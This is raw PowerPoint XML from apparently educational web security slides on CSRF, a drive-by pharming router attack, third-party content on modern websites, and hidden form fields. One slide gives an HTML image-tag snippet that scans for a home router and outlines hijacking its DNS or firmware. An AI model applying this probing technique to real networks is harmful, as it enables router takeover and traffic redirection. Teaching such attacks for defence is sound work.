              <a:rPr spc="-560" dirty="0"/>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-560" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-430" dirty="0"/>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-430" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-593" dirty="0"/>
              <a:t>About</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-568" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116739" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B03E9253-19C4-764E-8543-DF5ECF40BA14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="3465513"/>
            <a:ext cx="81311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744"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350"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prior attacks were using CRSF to abuse cookies. Assumed the user was  logged in and used their credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="13"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Not all attacks are attempting to abuse authenticated user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9974C86-2758-494E-B1E2-8F5ECC4342D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041525" y="1244600"/>
            <a:ext cx="5972175" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-693" dirty="0"/>
              <a:t>Home </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-528" dirty="0"/>
              <a:t>Router</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-543" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-553" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117763" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8A0341D-4506-8340-8157-F904A9795E09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="2520950"/>
            <a:ext cx="9499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756"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ts val="1263"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Drive-By Pharming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2350"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1313"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User visits malicious site. JavaScript at site scans home network looking  for broadband router</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;img	src=“192.168.0.1/img/linksys.png” onError=tryNext()	&lt;/img&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117764" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16053FBE-1248-C340-888D-C36F4631B2D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="5715000"/>
            <a:ext cx="85756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5567"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1813"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Once you find the router, try to login, replace firmware or change DNS to attacker-controlled server.  50% of home routers have guessable password.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01B6A25-9D87-C94E-99E2-70B55B33D2A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2938463" y="1244600"/>
            <a:ext cx="4184650" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-863" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-858" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-568" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118787" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93C20009-4C78-7340-925E-D1952D769258}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="2519363"/>
            <a:ext cx="8616950" cy="173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108"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ts val="2188"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="138"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute  unwanted actions on another web application (where they’re typically  authenticated)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2188"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF attacks specifically target state-changing requests, not data theft since the  attacker cannot see the response to the forged request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" alt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87DCF16-74BD-C94A-B048-086A5D8FF143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485900" y="3416300"/>
            <a:ext cx="7092950" cy="950913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6000" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6000" spc="125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6000" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6000" spc="145" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pages</a:t>
            </a:r>
            <a:endParaRPr sz="60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8BCB628-C12D-624C-BEA0-F7E7FFA9A317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854325" y="1244600"/>
            <a:ext cx="4348163" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-528" dirty="0"/>
              <a:t>Modern</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-425" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-523" dirty="0"/>
              <a:t>Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120835" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0483373-E960-9A40-B076-F68BFE6C717F}"/>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5FCF82E-9CAC-D246-83BD-3EB65F9E6545}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854325" y="1244600"/>
            <a:ext cx="4348163" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-528" dirty="0"/>
              <a:t>Modern</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-425" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-523" dirty="0"/>
              <a:t>Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8503BEE-F7BF-9848-B684-EF88B4DBF666}"/>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21860" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ACEB29F-B63D-B743-BEA0-BDA4D94C0C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1341438" y="2546350"/>
            <a:ext cx="7375525" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="20941">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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sz="2400" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2300" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="102000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The LA Times homepage includes 540 resources from  nearly 270 IP addresses, 58 networks, and 8 countries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="215000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CNN—the most popular news site—loads 361 resources  Many of these aren’t controlled by the main sites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AB49591-BDE2-4A4A-A7F9-037992670870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-152400" y="838200"/>
            <a:ext cx="9820275" cy="554038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="877928" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" spc="15" dirty="0"/>
              <a:t>Online</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="85" dirty="0"/>
              <a:t>ordering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" spc="85" dirty="0"/>
              <a:t> (hidden field example)</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{808084BD-EF48-7944-B750-8DAF6ED86C26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1698625" y="2884488"/>
            <a:ext cx="2789238" cy="25558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28" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C08B70-B633-C647-9284-297149C1E5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1719263" y="2894013"/>
            <a:ext cx="2747962" cy="25161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5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27603845-75FF-E440-B235-42B732C685A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2578100" y="2857500"/>
            <a:ext cx="1028700" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Order</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26630" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{990D7922-5BE0-6348-9A3C-ABF0E21489AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1984375" y="3657600"/>
            <a:ext cx="1012825" cy="990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7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F9A01A4-58B5-0E4A-A94E-8071A66B15D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="4648200"/>
            <a:ext cx="862013" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$5.50</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26632" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E058368B-8867-0E44-920B-50D07DAAA29A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3138488" y="3914775"/>
            <a:ext cx="1144587" cy="4953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33" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCF61A49-CA2A-424F-AADB-DAF9AA1DE371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3157538" y="3924300"/>
            <a:ext cx="1106487" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 976856 w 1105535"/>
              <a:gd name="T1" fmla="*/ 0 h 455295"/>
              <a:gd name="T2" fmla="*/ 150291 w 1105535"/>
              <a:gd name="T3" fmla="*/ 0 h 455295"/>
              <a:gd name="T4" fmla="*/ 102784 w 1105535"/>
              <a:gd name="T5" fmla="*/ 7626 h 455295"/>
              <a:gd name="T6" fmla="*/ 61528 w 1105535"/>
              <a:gd name="T7" fmla="*/ 28886 h 455295"/>
              <a:gd name="T8" fmla="*/ 29000 w 1105535"/>
              <a:gd name="T9" fmla="*/ 61296 h 455295"/>
              <a:gd name="T10" fmla="*/ 7665 w 1105535"/>
              <a:gd name="T11" fmla="*/ 102394 h 455295"/>
              <a:gd name="T12" fmla="*/ 0 w 1105535"/>
              <a:gd name="T13" fmla="*/ 149715 h 455295"/>
              <a:gd name="T14" fmla="*/ 0 w 1105535"/>
              <a:gd name="T15" fmla="*/ 312869 h 455295"/>
              <a:gd name="T16" fmla="*/ 7665 w 1105535"/>
              <a:gd name="T17" fmla="*/ 360193 h 455295"/>
              <a:gd name="T18" fmla="*/ 29000 w 1105535"/>
              <a:gd name="T19" fmla="*/ 401297 h 455295"/>
              <a:gd name="T20" fmla="*/ 61528 w 1105535"/>
              <a:gd name="T21" fmla="*/ 433710 h 455295"/>
              <a:gd name="T22" fmla="*/ 102784 w 1105535"/>
              <a:gd name="T23" fmla="*/ 454966 h 455295"/>
              <a:gd name="T24" fmla="*/ 150291 w 1105535"/>
              <a:gd name="T25" fmla="*/ 462601 h 455295"/>
              <a:gd name="T26" fmla="*/ 976856 w 1105535"/>
              <a:gd name="T27" fmla="*/ 462601 h 455295"/>
              <a:gd name="T28" fmla="*/ 1024363 w 1105535"/>
              <a:gd name="T29" fmla="*/ 454966 h 455295"/>
              <a:gd name="T30" fmla="*/ 1065618 w 1105535"/>
              <a:gd name="T31" fmla="*/ 433710 h 455295"/>
              <a:gd name="T32" fmla="*/ 1098152 w 1105535"/>
              <a:gd name="T33" fmla="*/ 401297 h 455295"/>
              <a:gd name="T34" fmla="*/ 1119486 w 1105535"/>
              <a:gd name="T35" fmla="*/ 360193 h 455295"/>
              <a:gd name="T36" fmla="*/ 1127147 w 1105535"/>
              <a:gd name="T37" fmla="*/ 312869 h 455295"/>
              <a:gd name="T38" fmla="*/ 1127147 w 1105535"/>
              <a:gd name="T39" fmla="*/ 149715 h 455295"/>
              <a:gd name="T40" fmla="*/ 1119486 w 1105535"/>
              <a:gd name="T41" fmla="*/ 102394 h 455295"/>
              <a:gd name="T42" fmla="*/ 1098152 w 1105535"/>
              <a:gd name="T43" fmla="*/ 61296 h 455295"/>
              <a:gd name="T44" fmla="*/ 1065618 w 1105535"/>
              <a:gd name="T45" fmla="*/ 28886 h 455295"/>
              <a:gd name="T46" fmla="*/ 1024363 w 1105535"/>
              <a:gd name="T47" fmla="*/ 7626 h 455295"/>
              <a:gd name="T48" fmla="*/ 976856 w 1105535"/>
              <a:gd name="T49" fmla="*/ 0 h 4552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5535" h="455295">
                <a:moveTo>
                  <a:pt x="957707" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="147345" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100770" y="7511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60322" y="28426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28427" y="60320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7511" y="100764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="307886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7511" y="354455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28427" y="394903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60322" y="426800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100770" y="447718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147345" y="455231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="957707" y="455231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004281" y="447718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1044729" y="426800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1076624" y="394903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1097541" y="354455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1105052" y="307886"/>
                </a:lnTo>
                <a:lnTo>
